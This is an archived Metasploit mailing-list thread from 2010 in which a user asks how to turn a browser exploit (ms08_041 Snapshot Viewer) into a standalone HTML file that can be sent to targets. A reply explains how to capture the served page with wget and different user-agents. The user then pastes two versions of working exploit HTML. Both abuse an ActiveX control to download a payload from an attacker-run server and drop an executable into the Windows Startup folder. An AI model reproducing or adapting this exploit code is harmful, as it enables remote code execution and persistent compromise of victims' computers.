Metasploit mailing list archives
Re: Convert browser type exploit into fileformat type
From: Spring Systems <korund () hotmail com>
Date: Thu, 15 Jul 2010 11:51:25 +0000
Hello, thanks for tipps. I used wget to get the html file: wget http://0.0.0.0:8080/Ft27e9lOzyu4ze the saved file isn't html format (which argument to use and which user-agent?) Its not full exploit code. Should I save page right after 'exploit' command (before server starting), or after executing exploit url http://192.168.0.1:8080/Ft27e9lOzyu4ze ? HTML code is different. before: <html> <head> <script> try { var Tk = new ActiveXObject('snpvw.Snapshot Viewer Control.1'); Tk.SnapshotPath = "http://192.168.0.1:8080/JQ7QEMXl/payload";; Tk.CompressedPath = "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\\LWkN.exe"; Tk.PrintSnapshot(); } catch( e ) { window.location = 'about:blank' ; } </script> </head> </html> after: <html> <head> <script> try { var zBKesSzcrxkcDZdYDKsfIpjWKOrmMahQuoJqEAMceosEQsCZJcGBqWnGVkzVFdLswboqAQU = new ActiveXObject('snpvw.Snapshot Viewer Control.1'); zBKesSzcrxkcDZdYDKsfIpjWKOrmMahQuoJqEAMceosEQsCZJcGBqWnGVkzVFdLswboqAQU.SnapshotPath = "http://192.168.0.1:8080/Ft27e9lOzyu4ze/payload";; zBKesSzcrxkcDZdYDKsfIpjWKOrmMahQuoJqEAMceosEQsCZJcGBqWnGVkzVFdLswboqAQU.CompressedPath = "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\\GOvpJExYixLPWreOPU.exe"; zBKesSzcrxkcDZdYDKsfIpjWKOrmMahQuoJqEAMceosEQsCZJcGBqWnGVkzVFdLswboqAQU.PrintSnapshot(); } catch( e ) { window.location = 'about:blank' ; } </script> </head> </html> Best Regards, Alex ________________________________
From: atul () secfence com Date: Thu, 15 Jul 2010 15:29:29 +0530 Subject: Re: [framework] Convert browser type exploit into fileformat type To: korund () hotmail com CC: framework () spool metasploit com Hello, You can convert *almost* all browser based exploits to fileformat ones. As you would have already guessed, you would then be needing to send the html file to exploit, instead of pointing the link. The general guideline is to start the browser based exploit, and save the page using wget (or anything similar) with appropriate user-agent(s). But ofcourse, this can have some complications as (for ex.) iepeers browser exploit on metasploit launches IE6 and IE7 exploits based on the useragent. So you will have to change user-agent appropriately and save all the variations it has to offer. Another complication could be the fact that an in order to exploit a vuln, loading more than HTML or JS is needed. Take for instance, the Aurora exploit, which required the browser to render an external media (metasploit used gif, I think) for successful exploitation. In order to *convert* that exploit to fileformat, you will have to save that file too. Hope that helped. Thanks, Atul Agarwal Secfence Technologies www.secfence.com On Thu, Jul 15, 2010 at 3:18 PM, Spring Systems> wrote: Hello, how to convert browser type exploit into "fileformat" type to save it in html or php form? for example http://www.metasploit.com/modules/exploit/windows/browser/ms08_041_snapshotviewer have no fileformat version. How to save exploit with payload in html ot php form? Regards, Alex _________________________________________________________________ The New Busy is not the too busy. Combine all your e-mail accounts with Hotmail. http://www.windowslive.com/campaign/thenewbusy?tile=multiaccount&ocid=PID28326::T:WLMTAGL:ON:WL:en-US:WM_HMP:042010_4 _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_________________________________________________________________ The New Busy is not the too busy. Combine all your e-mail accounts with Hotmail. http://www.windowslive.com/campaign/thenewbusy?tile=multiaccount&ocid=PID28326::T:WLMTAGL:ON:WL:en-US:WM_HMP:042010_4 _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Re: New Javascript Packer: JSidle, (continued)
- Re: New Javascript Packer: JSidle Miguel Rios (Jul 11)
- Re: New Javascript Packer: JSidle Sven Taute (Jul 12)
- Re: New Javascript Packer: JSidle Miguel Rios (Jul 13)
- Re: New Javascript Packer: JSidle Thorgul (Jul 13)
- Re: New Javascript Packer: JSidle Miguel Rios (Jul 13)
- Re: New Javascript Packer: JSidle Miguel Rios (Jul 13)
- Re: New Javascript Packer: JSidle Thorgul (Jul 13)
- Re: New Javascript Packer: JSidle Miguel Rios (Jul 13)
- Convert browser type exploit into fileformat type Spring Systems (Jul 15)
- Re: Convert browser type exploit into fileformat type Atul Agarwal (Jul 15)
- Re: Convert browser type exploit into fileformat type Spring Systems (Jul 15)
- Re: Convert browser type exploit into fileformat type Spring Systems (Jul 15)
- Re: Convert browser type exploit into fileformat type Spring Systems (Jul 16)